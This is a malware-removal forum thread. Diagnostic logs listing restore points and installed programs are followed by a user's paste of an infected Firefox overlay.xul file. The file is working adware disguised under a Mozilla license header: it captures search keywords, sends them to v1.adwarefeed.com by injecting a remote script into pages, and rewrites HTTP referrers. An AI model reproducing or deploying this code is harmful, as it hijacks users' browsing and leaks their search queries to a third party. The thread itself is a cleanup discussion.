RP24: 12/14/2008 4:44:08 PM - System Checkpoint

RP25: 12/15/2008 5:38:20 PM - System Checkpoint

RP26: 12/16/2008 6:38:18 PM - System Checkpoint

RP27: 12/17/2008 8:07:56 PM - System Checkpoint

RP28: 12/18/2008 1:00:23 PM - Software Distribution Service 3.0

RP29: 12/18/2008 9:41:10 PM - SPTD setup V1.50

RP30: 12/19/2008 11:55:54 PM - System Checkpoint

RP31: 12/21/2008 12:40:01 AM - System Checkpoint

RP32: 12/22/2008 1:11:16 AM - System Checkpoint

RP33: 12/23/2008 1:13:04 AM - System Checkpoint

RP34: 12/24/2008 2:09:59 AM - System Checkpoint

RP35: 12/25/2008 2:11:01 AM - System Checkpoint

RP36: 12/26/2008 3:09:55 AM - System Checkpoint

RP37: 12/27/2008 4:09:55 AM - System Checkpoint

RP38: 12/28/2008 5:09:59 AM - System Checkpoint

RP39: 12/29/2008 6:09:55 AM - System Checkpoint

RP40: 12/30/2008 7:09:55 AM - System Checkpoint

RP41: 12/31/2008 8:08:12 AM - System Checkpoint

RP42: 1/1/2009 1:28:42 AM - Installed DirectX

RP43: 1/2/2009 2:27:54 AM - System Checkpoint

RP44: 1/3/2009 3:32:28 AM - System Checkpoint

RP45: 1/4/2009 3:42:05 AM - System Checkpoint

RP46: 1/5/2009 4:28:58 AM - System Checkpoint

RP47: 1/6/2009 9:28:13 AM - System Checkpoint

RP48: 1/6/2009 1:01:33 PM - Installed MyRate from Progressive Insurance

RP49: 1/7/2009 1:28:58 PM - System Checkpoint

RP50: 1/8/2009 1:42:12 PM - System Checkpoint

RP51: 1/9/2009 4:56:28 PM - System Checkpoint

RP52: 1/10/2009 6:15:38 PM - System Checkpoint

RP53: 1/11/2009 7:55:31 PM - System Checkpoint

RP54: 1/12/2009 9:32:20 PM - System Checkpoint

RP55: 1/14/2009 1:14:29 AM - System Checkpoint

RP56: 1/14/2009 1:00:18 PM - Software Distribution Service 3.0

RP57: 1/15/2009 12:16:02 PM - Installed Windows XP KB915865.

RP58: 1/15/2009 12:16:55 PM - Installed Windows NLSDownlevelMapping.

RP59: 1/15/2009 12:17:43 PM - Installed Windows IDNMitigationAPIs.

RP60: 1/15/2009 12:18:07 PM - Installed Windows Internet Explorer 7.

RP61: 1/15/2009 1:00:20 PM - Software Distribution Service 3.0

RP62: 1/16/2009 1:24:12 PM - System Checkpoint

RP63: 1/17/2009 2:24:09 PM - System Checkpoint

RP64: 1/18/2009 8:31:02 PM - System Checkpoint

RP65: 1/19/2009 10:19:11 PM - System Checkpoint

RP66: 1/20/2009 11:20:30 PM - System Checkpoint

RP67: 1/22/2009 3:05:19 AM - System Checkpoint

RP68: 1/23/2009 4:02:34 AM - System Checkpoint

RP69: 1/24/2009 4:58:48 AM - System Checkpoint

RP70: 1/25/2009 7:11:31 AM - System Checkpoint

RP71: 1/26/2009 7:58:31 AM - System Checkpoint

RP72: 1/27/2009 9:30:26 AM - System Checkpoint

RP73: 1/28/2009 9:58:31 AM - System Checkpoint

RP74: 1/29/2009 10:58:31 AM - System Checkpoint

RP75: 1/30/2009 4:26:00 PM - System Checkpoint

RP76: 1/31/2009 6:21:17 PM - System Checkpoint

RP77: 2/1/2009 7:35:49 PM - System Checkpoint

RP78: 2/2/2009 7:58:53 PM - System Checkpoint

RP79: 2/3/2009 1:44:35 PM - Software Distribution Service 3.0

RP80: 2/4/2009 5:07:34 PM - System Checkpoint

RP81: 2/6/2009 1:08:23 AM - System Checkpoint

RP82: 2/7/2009 1:54:39 AM - System Checkpoint

RP83: 2/8/2009 2:43:17 AM - System Checkpoint

RP84: 2/9/2009 3:56:18 AM - System Checkpoint

RP85: 2/10/2009 4:42:57 AM - System Checkpoint

RP86: 2/11/2009 5:42:58 AM - System Checkpoint

RP87: 2/12/2009 6:43:02 AM - System Checkpoint

RP88: 2/12/2009 1:00:21 PM - Software Distribution Service 3.0

RP89: 2/13/2009 1:16:27 PM - System Checkpoint

RP90: 2/14/2009 4:57:22 PM - System Checkpoint

RP91: 2/15/2009 10:37:29 PM - System Checkpoint

RP92: 2/17/2009 5:50:46 AM - System Checkpoint

RP93: 2/18/2009 6:16:07 AM - System Checkpoint

RP94: 2/19/2009 7:16:08 AM - System Checkpoint

RP95: 2/20/2009 7:57:16 AM - System Checkpoint

RP96: 2/21/2009 8:57:18 AM - System Checkpoint

RP97: 2/22/2009 9:57:15 AM - System Checkpoint

RP98: 2/23/2009 10:57:15 AM - System Checkpoint

RP99: 2/24/2009 11:35:11 AM - System Checkpoint

RP100: 2/25/2009 11:57:16 AM - System Checkpoint

RP101: 2/25/2009 1:00:19 PM - Software Distribution Service 3.0

RP102: 2/26/2009 2:31:45 PM - System Checkpoint

RP103: 2/27/2009 3:19:24 PM - System Checkpoint

RP104: 2/28/2009 4:19:25 PM - System Checkpoint

RP105: 3/1/2009 4:22:47 PM - System Checkpoint

RP106: 3/3/2009 6:28:11 AM - System Checkpoint

RP107: 3/4/2009 6:38:02 AM - System Checkpoint

RP108: 3/5/2009 7:27:35 AM - System Checkpoint

RP109: 3/6/2009 8:04:00 AM - System Checkpoint

RP110: 3/7/2009 3:04:12 AM - ComboFix created restore point

RP111: 3/7/2009 4:30:44 AM - ComboFix created restore point

RP112: 3/7/2009 7:24:21 AM - ComboFix created restore point

RP113: 3/8/2009 8:20:32 AM - System Checkpoint

RP114: 3/8/2009 11:33:13 PM - Removed Blaze Media Pro

==== Installed Programs ======================

1600

1600_Help

1600Trb

AceFTP 3 Freeware

Ad-Aware

Add or Remove Adobe Creative Suite 3 Master Collection

Adobe Acrobat 8 Professional

Adobe Acrobat 8.1.2 Professional

Adobe After Effects CS3

Adobe After Effects CS3 Presets

Adobe Anchor Service CS3

Adobe Asset Services CS3

Adobe Bridge CS3

Adobe Bridge Start Meeting

Adobe BridgeTalk Plugin CS3

Adobe Camera Raw 4.0

Adobe CMaps

Adobe Color - Photoshop Specific

Adobe Color Common Settings

Adobe Color EU Extra Settings

Adobe Color JA Extra Settings

Adobe Color NA Recommended Settings

Adobe Contribute CS3

Adobe Creative Suite 3 Master Collection

Adobe Default Language CS3

Adobe Device Central CS3

Adobe Dreamweaver CS3

Adobe Encore CS3

Adobe Encore CS3 Codecs

Adobe ExtendScript Toolkit 2

Adobe Extension Manager CS3

Adobe Flash CS3

Adobe Flash Player 10 Plugin

Adobe Flash Player 9

Adobe Flash Player 9 ActiveX

Adobe Flash Player ActiveX

Adobe Flash Video Encoder

Adobe Fonts All

Adobe Help Viewer CS3

Adobe Illustrator CS3

Adobe InDesign CS3

Adobe InDesign CS3 Icon Handler

Adobe Linguistics CS3

Adobe MotionPicture Color Files

Adobe PDF Library Files

Adobe Photoshop CS3

Adobe Premiere Pro CS3

Adobe Premiere Pro CS3 Functional Content

Adobe Premiere Pro CS3 Third Party Content

Adobe Setup

Adobe Shockwave Player

Adobe SING CS3

Adobe Soundbooth CS3

Adobe Soundbooth CS3 Codecs

Adobe Stock Photos CS3

Adobe SVG Viewer 3.0

Adobe Type Support

Adobe Update Manager CS3

Adobe Version Cue CS3 Client

Adobe Version Cue CS3 Server

Adobe Video Profiles

Adobe WAS CS3

Adobe WinSoft Linguistics Plugin

Adobe XMP DVA Panels CS3

Adobe XMP Panels CS3

Advanced IM Password Recovery (remove only)

AHV content for Acrobat and Flash

AiO_Scan

AiOSoftware

Alarm 2.0.2

Apple Mobile Device Support

Apple Software Update

ATI Display Driver

ATITool Overclocking Utility

Audacity 1.2.6

AutoUpdate

AVS Video Converter 6

Beyond the Red Line

Bioshock

Bonjour

Combined Community Codec Pack 2007-07-22

CuteFTP 8 Home

DAO

DB-Tool 2.0

DivX Author Trial Version

DivX Codec

DivX Converter

DivX Player

DivX Web Player

DS-MP3 Source 1.30

DScaler 5 Mpeg Decoders

EditPlus 2

eFile Express 2006

eFile Express 2007

eFile Express 2008

Express Burn

Fax

ffdshow (remove only)

FLAC Installer 1.1.2a (remove only)

FontDoctor for Windows

Free MP3 Converter

Google Earth

Half-Life 2

Half-Life 2: Deathmatch

HijackThis 2.0.2

Homeworld2

Hotfix for Windows Internet Explorer 7 (KB947864)

Hotfix for Windows Media Format 11 SDK (KB929399)

Hotfix for Windows Media Player 11 (KB939683)

Hotfix for Windows XP (KB896344)

Hotfix for Windows XP (KB914440)

Hotfix for Windows XP (KB928388)

Hotfix for Windows XP (KB929120)

Hotfix for Windows XP (KB952287)

HP Image Zone Express

HP Product Assistant

HP PSC & OfficeJet 4.7

HP Software Update

iDump v1.1.1

Intel® Active Monitor

Intel® PRO Network Adapters and Drivers

iTunes

J2SE Runtime Environment 5.0 Update 6

Macromedia Extension Manager

Macromedia Flash 8

Macromedia Flash 8 Video Encoder

Macromedia Flash Player 8

Malwarebytes' Anti-Malware

Microsoft .NET Framework 2.0

Microsoft Base Smart Card Cryptographic Service Provider Package

Microsoft Internationalized Domain Names Mitigation APIs

Microsoft National Language Support Downlevel APIs

Microsoft User-Mode Driver Framework Feature Pack 1.0

Microsoft Visual C++ 2005 Redistributable

mIRC

MixPad

Mozilla Firefox (3.0.7)

Mozilla Thunderbird (2.0.0.19)

MSXML 4.0 SP2 (KB927978)

MSXML 4.0 SP2 (KB936181)

MSXML 4.0 SP2 (KB954430)

MultipleIEs

MyRate from Progressive Insurance

Nero 7

Norton AntiVirus

NVIDIA Drivers

OpenOffice.org 2.0

PDF Settings

Portal

Portal

Link to post
Share on other sites

so whatever I caught did something to my overlay.xul file, reading up on Mozillas forums it seems like there's only 100 or so lines of code to do this:

<?xml version="1.0" encoding="UTF-8"?>

<!--

/* ***** BEGIN LICENSE BLOCK *****

* Version: MPL 1.1/GPL 2.0/LGPL 2.1

*

* The contents of this file are subject to the Mozilla Public License Version

* 1.1 (the "License"); you may not use this file except in compliance with

* the License. You may obtain a copy of the License at

* http://www.mozilla.org/MPL/

*

* Software distributed under the License is distributed on an "AS IS" basis,

* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License

* for the specific language governing rights and limitations under the

* License.

*

* The Original Code is XUL Reference.

*

* The Initial Developer of the Original Code is

*

* Einar Egilsson. (email: xulcache@einaregilsson.com)

*

* Portions created by the Initial Developer are Copyright © 2006

* the Initial Developer. All Rights Reserved.

*

* Contributor(s):

*

* Alternatively, the contents of this file may be used under the terms of

* either the GNU General Public License Version 2 or later (the "GPL"), or

* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),

* in which case the provisions of the GPL or the LGPL are applicable instead

* of those above. If you wish to allow use of your version of this file only

* under the terms of either the GPL or the LGPL, and not to allow others to

* use your version of this file under the terms of the MPL, indicate your

* decision by deleting the provisions above and replace them with the notice

* and other provisions required by the GPL or the LGPL. If you do not delete

* the provisions above, a recipient may use your version of this file under

* the terms of any one of the MPL, the GPL or the LGPL.

*

* ***** END LICENSE BLOCK ***** */

-->

<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

<script type="application/x-javascript" >

window.addEventListener("load", function() { xulRef.init(); }, false);

window.addEventListener("load", initRequestObserver, false);

var xulRef = {

init:

function(){

var appcontent = document.getElementById("appcontent");

if(appcontent){

appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);

}

},

onPageLoad:

function(aEvent){

var doc = aEvent.originalTarget;

var loc = doc.location.href;

var ref = doc.referrer;

var keyword = '';

var engine ;

var __d = "http://v1.adwarefeed.com/ffjs.php?u=1011058659-839522115-1715567821-725345543&a=998&s=3&v=icv20020901ff&e=";

if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'google';

// } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){

// keyword = RegExp.$1;

} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){

keyword = RegExp.$1;

engine = 'yahoo';

} else if(loc.match(/altavista\.com.*results[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'altavista';

} else if(loc.match(/alltheweb\.com.*search[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'alltheweb';

} else if(loc.match(/search\.netscape\.com.*search[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'netscape';

} else if(loc.match(/search\.aol\.com.*search[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'aol';

} else if(loc.match(/ask\.com.*web[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'ask';

} else if(loc.match(/search\.com.*search[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'searchcom';

} else if(loc.match(/search\.lycos\.com.*[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'lycos';

} else if(loc.match(/nova\.rambler\.ru.*search[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'rambler';

} else if(loc.match(/gogo\.ru.*go[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'gogo';

} else if(loc.match(/meta\.ua.*search.asp[&\?]q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'meta';

//} else if(loc.match(/au\.ru.*searchPhrase=([^&]*)/)){

// keyword = RegExp.$1;

} else if(loc.match(/all\.by.*search.*[&\?]query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'allby';

// } else if(loc.match(/uaport\.net.*UAcatalog[/][&\?].*query=([^&]*)/)){

// keyword = RegExp.$1;

} else if(loc.match(/search\.msn\.com.*results.*[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'msn';

} else if(loc.match(/search\.live\.com.*results.*[&\?]q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'live';

};

if( keyword.length > 0 ){

var script = window.content.document.createElement('script');

script.id = "js_0";

script.src = __d + engine + '&q=' + keyword;

doc.getElementsByTagName('head')[0].appendChild(script);

}

}

};

function initRequestObserver() {

var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);

observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);

}

var httpRequestObserver = {

observe:

function(subject, topic, data) {

if(topic == "http-on-modify-request") {

var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);

var pos = subject.URI.spec.indexOf("&rf=http");

if(pos > -1) {

var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);

httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);

}

}

}

};

</script>

</overlay>

I removed this file and I'll keep testing.

Link to post
Share on other sites

  • 2 weeks later...
  • Root Admin

Topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

The fixes and advice in this thread are for this machine only. Do not apply the instructions from this thread to your own machine. Please start a new thread describing your issue and someone will be along to assist you.

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.